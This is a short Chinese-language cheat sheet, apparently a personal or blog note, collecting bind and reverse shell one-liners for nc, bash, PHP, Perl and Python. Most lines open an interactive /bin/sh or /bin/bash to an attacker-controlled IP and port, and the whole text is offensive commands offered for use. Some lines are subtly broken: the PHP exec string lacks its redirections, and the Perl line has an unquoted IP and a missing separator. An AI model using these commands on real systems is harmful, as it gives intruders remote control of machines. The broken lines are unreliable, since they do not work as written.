弹Shell的姿势多种多样,只有想不到,本篇笔记持续更新
NC
1、正向
靶机:nc -lvvp 7777 -e /bin/bash
攻击机:nc server-ip 7777
2、反向
nc -e /bin/bash Client-ip 7777
Bash
bash -i >& /dev/tcp/Client-IP/7777 0>&1
PHP
php -r '$sock=fsockopen("192.168.118.128",4444);exec("/bin/sh -i &3 2>&3");'
perl
perl -e 'use Socket;$i=10.9.1.21$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'